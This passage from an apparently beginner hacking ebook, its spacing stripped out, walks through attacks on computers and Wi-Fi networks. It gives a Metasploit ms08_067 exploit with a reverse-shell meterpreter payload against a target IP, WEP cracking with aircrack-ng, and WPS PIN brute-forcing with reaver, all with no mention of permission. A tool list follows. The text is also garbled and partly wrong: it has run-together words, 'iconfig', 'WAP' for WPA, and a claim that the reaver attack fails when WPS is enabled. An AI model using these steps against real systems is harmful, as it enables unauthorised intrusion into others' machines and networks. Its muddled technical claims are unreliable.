mightnotbethemostpracticalone,butit’sagoodstartinghackforbeginners.Withthis
hack,youcangetagoodsenseofwhatisinvolvedandworkupfromthere.

1. StartupKaliLinuxandopenanewterminalup.
2. ThenstartupMetasploit.ThisisaprogramthatisalreadyincludedonKali

Linux.Itwillperformanattackonthenetwork.Youcanstartitupbytypingin
“msfconsole”asacommand.Thismaytakeafewminutes,sobepatient.

3. OnceMetasploitstartsup,youcantypeinsomecommandsthatwillprogressthe

hack.Heretheyareinorder:

“usewindows/smb/ms08_067_netapi”

“setPAYLOADwindows/meterpreter/reverse_tcp”

“setLHOST(yourIPaddress)”[YoumightnotknowwhatyourIPaddressis.Youcan
findoutbyjustopeningupanewterminalandtypinginthecommand“iconfig”.You’ll
seeyourIPaddressintheoutput.]

“setLPORT4444”

“setRHOST(theIPofthetargetnetwork)”

“setRPORT445”

“exploit”

Oneyoudoallthat,youshouldconnect.Ifyouaren’tsurewhattodoorwhatcommands
areavailabletoyou,justtypein“help”andalistofcommandswillbedisplayed.

1. Nowyouarein.You’vesuccessfullyhackedthecomputer,andyoucancheckfor

networkweaknessesorwhateverelseyouneedto.

Thereisgoodachancethatthisexploitwon’twork.Ifthetargetnetworkhasblockedport
445,thenyouwillneedtouseadifferenttactic.Also,somenewerversionsofWindows
willautomaticallyblockthisexploit.That’sokay,becausewehavesomemoremethodsof
hackingforyoutouse.

GeneralWEPHack

Thisnexthackisgoingtobemoreusefulforcurrentoperatingsystemsandnetworks.
Herewego:

1.Determinethenameofthewirelessadapter.Itispossiblethatthetargetcomputerwill
havemultiplenetworks.Ifthatisthecase,thenyouwillhavetoknowofthenameofthe
oneyouwanttoscan.Youarelookingforonethatsays“wlan”.Ifitsays“eth”for
Ethernetor“lo”forloopback,thenitwon’tbetheonewearelookingfor.Toseeallthe
adaptersthecomputerhas,typein“ifconfig”usingaterminal.Justtakenoteofthewlan
adapters.

2.Turnonmonitormode.Youcandothatbyusingthe“airmon-ngstartwlan0”command.
The“0”inthiscommandstandsforthenetworkyouwanttohackinto.Justsetthe
numberofthenetworkofyourchoiceinplaceofthat“0”.Typinginthiscommandwill
createavirtualconsolewhichisknownasamonitor.Itmaybecalled“mon”onyour
display.

IfyouareusingthelatestversionofKaliLinux,youmayseeadifferentnameforthe
monitorthanjust“mon”.Itcouldbe“mon0”or“wlan0mon”.Also,theairmon-ng
commandmaynotworkproperlyforyou.Ifthathappens,tryusingairmon-ngcheckkill.
Thiscommandlookslikethis:“airmon-ng<check|checkkill>”.

3.Youcanbegincapturingpackets.Thissimplymeansyouareinterceptingpiecesofdata
thataremovingacrossthenetworkconnection.Youcanusethe“airodump-ng”command
tobeginthecapturingprocess.Thiswilltakedatafromthepacketsthataremoving
throughtheair.Whenyoudothat,youwillseethenameofthetargetnetwork.

4.Fromthere,youcanstorethepacketsyoucaptureinafile.Dothisbyusingthe
“airodump”command.Thefullcommandyouwillusewilllooklikethis:“airodump-ng
mon0(plusthenameofthefileyouwanttocapture)”.Inthisexample,the“0”in“mon0”
isthenameofthenetwork.Sothenumberyouusemayvaryfromtheexamplegiven.

Youcanfindthepacketsyoucapturedinfilesthatlooklikethis:“(nameofthefile).cap”.
Youcan’tdothisrightawaythough.Youhavetowaituntilthereisenoughdataavailable.

1. TheWi-Fiiscracked.Atthispoint,youcanjusttypeinthecommand“aircrack-

ng”inordertodeterminethepassword.Remember,thistakesafewseconds,so
don’texpectinstantresultseverytime.Thiscommandneedstobeperformedina
newterminal.

2. TheprogrammayaskyouwhichWi-Fiyouwanttohackinto,butonlyifthereis

morethanonetochoosefrom.Youshouldgetinprettyfast,ifthepasswordis
weak.Forverystrongpasswords,youwillneedmorepackets.Theprogramis
goingtotryagainforitselfonceyouhave15,000packets,andifitis
unsuccessful,itwillkeeptryingateachnew5,000packetmilestone.

H

9

HACKINGWAPANDWAP2

ackingintoaWEPnetworkisprettyeasy.Thesecurityjustisn’tthattight,aswehave

previouslydiscussed.TohackintoaWAPorWAP2networkwilltakesomeextraeffort.
YoumightnotevenbeabletofindawayinusingKaliLinux.Abruteforceattackcould
takeaslongasseveralyears.Itdependsonthelengthofthepasswordandvariousother
factorsthatcreatesecurityforthenetwork.

TheproblemwithWPAtechisthatitcanbereallyhardtoconfigure.Tomakeiteasier,
WPSisaddedtocomplementWPA,butitdoescomewithanexploitablehole,and
programslikeReaverareexcellentatgettingthroughthathole.Theattackcanstilltake
severalhourstocomplete,butitisbetterthannotbeingabletogetthroughforyears.

WPSsendsan8-digitpintotheclient.Thesepinsonlycontainnumbers,sothereisa
limitednumberofguessesitwouldtaketocrackit.Still,withallthepossiblechoices,
tryingeachguesscantakeaverylongtime.WPAusescharacters,numbersandletters,so
guessingthepasswordcanbeinfinitelytougher.InWPS,therewillbeaslightdelayin
waitingfortheAPstorespond.Youwillprobablyonlybeabletogetinafewkeysper
second.Evenatthatspeed,itcanstilltakeyearstogetin,butthankfullytherearesome
weaknessestoexploit.

Weknowthatthe8

th

digitisalwaysachecksumofallthepreviousdigits.Thiscutsdown

thepossibilitiesconsiderably,butitwouldstilltakefartoolongtomakeitworthour
while.Wecanalsobreakdownthepinnumberintotwoseparateparts,whichmakesthe
workgotwiceasfast.Whatthisboilsdowntois11,000guesses,thoughoddsarewe
won’thavetoexhaustthemallbeforewefindtheanswer.Thismeansitshouldtakeabout
threehourstogothrougheveryguess,soyouarelookingatsomewherelessthanthree
hoursforthehack.Ifyouaretryingkeysslowly,though,itcantakemuchlonger.

Toperformtheattack,youwon’tneedtodoalotofcomplicatedwork.Ifyouhave
everythinginplace,thenyoucansimplyputinthecommand:

“reaver-i(interface-name)-b(BSSIDofyourtarget)

IfyouknowhowtohackaWEP,thenthisisbasicallythesameprocess.Weareworking
withReaverthistime,whichmakesthingseasierforyou,butitisstillharderoverall,
sinceyouarehackingintoaWPAorWPA2insteadofthemuchsimplerWEP.

1. StartupKaliLinux,thenbeginmonitormode.Thecommandforthatis:“airmon-

ngstartwlan0”.Likewiththelasthackweshowedyou,the“0”representsthe
networkname“whichisanumber).Onceyouknowthatname,substituteour“0”
forthecorrectnumber.

2. YouwillneedtheBBSSIDnumberofthenetworkyouaregoingtohackinto.
3. IfWPSisenabled,thenthishackwon’twork.IfyouwanttocheckWPS

activation,thenusethe“wash”commandor“airodump-ng”Usingwashispretty
easysinceitisdesignedspecificallyforthispurpose.

4. Thewashcommandgoeslikethis:“wash-imon0”.Remembertosubstitutethat

“0”.Thiswillalsostartupyoursysteminmonitormode.Ifyouseeanynetworks
afteryouhaveusedwash,thenWPSisenabledandyouwilllikelyhavetogive
up.

5. TheBSSIDnumberwillneedtobecombinedwithReaverforyournext

command.Thisis“reaver-imon0-b(BSSIDnumber).Reaverhasmore
advancedoptionsyoucanuse,andyoumaywanttomakeuseofthemtoincrease
yourhack’sefficiency.The-vwoption,forexample,makesyourtoolmore
verbose,tellingyouwhatishappeningrightonyourterminal.Soifyouare
experiencedathackingandusingReaver,thenthisisaninvaluableasset.Italso
helpsyousortthroughproblemsastheyhappen.Ifyouaregoingtousethistool,
justtypeinthecommand“reaver-imon0-b(BSSIDnumber)-vv

6. Nowyou’rein.Ifyouarehavinganytroubleortheprocessistakingfarlonger

thanitshould,thenyoumayneedtokillsomeprocesses.Thiswillfreeupsome
memoryforyoutouse.

Ifyouneedmoreinformationpleasechecktheadditionalresourcessectionofthisbook.

H

O

10

ADDITIONALRESOURCES

erearesomehackingsoftwaretoolsyoucanusetomakeyourlifealittlebiteasier.

It’sbesttostartoutwithwhatwascoveredearlierinthisbook.Then,onceyouare
comfortable,moveontotestsomeoftheseout.

Aircrack

Thisranksamongthemostpopularpasswordcrackersoutthere.Itcomeswithan
installationtutorial,soitshouldbeeasyenoughtouse.ItperformsaWEPattacksomake
surethatyouareusingthissoftwarefortherightkindofnetwork.Youshouldalsoensure
thatthewirelesscardcaninjectdatapackets.Ifitcan’t,thistoolwon’tbemuchhelpto
you.YoucanfindAircrackright

here

.

http://www.aircrack-ng.org/

Airjack

Youwillbeexploitingman-in-the-middleflawswiththistool.It’sapacketinjection
programthatisavailableright

here

.

http://sourceforge.net/projects/airjack/

nlinehashcrack.com

Usingadictionaryattacksguessespasswordsforyouautomatically.ItworksonWPA
networks,andyoucanfinditright

here

.

http://www.onlinehashcrack.com

CommViewforWi-Fi

Thisprotocolanalysistoolalsoperformswirelessmonitoring.Itcandecodepacketsfrom
bothWEPandWPAnetworks.IfyouwanttokeeptrackofWi-Fitrafficsoyouknow
exactlywhoisusingyournetwork,thenthisisagreattoolforyou.You’llbeabletogetit

here

.

http://www.tamos.com/products/commwifi/

inSSIDer

Thisonewillcostyou,butitisanaward-winningscanner.Itworksonmostversionsof
WindowsaswellasOSX.ItisusedtosniffoutnetworkLANs,andyoucanfinditfor
about$20

here

.

http://www.inssider.com/

OmniPeek

OmniPeekonlyworksonWindowsOS.Itisanetworkanalyzerthatcapturestrafficfrom
thenetwork.Youcanfindthisexcellenttroubleshootingtool

here

.

http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer

WireShark

LiketheinSSIDer,theWireSharkisgreatforanalyzingnetworkprotocols.Youcancheck
networktrafficwithit,butithelpstohaveadecentunderstandingofhownetwork
protocolworks.You’llfindthisone

here

.

https://www.wireshark.org/

WepAttack

ThisLinuxtoolisopensource,anditisgreatforbreakingkeysfrom802.11WEP
networks.YouwillneedaWLANcardforittowork,anditusesafairlystandardbut
somewhatslowdictionaryattack.Youcanfindit

here

.

http://wepattack.sourceforge.net/

Themajorityoftheseareavailableforfreeandareupdatedregularly.Soyoushouldnot
haveanyproblemdownloadingthemandtestingthemout.Youdefinitelywanttolook
intothefreetoolstofirsttoseeifthatcandowhatyouneedbeforeyoulookatpaidones.

T

hankyouforreading:Clickortouchtheimageandletusknowifyoulikeourbook!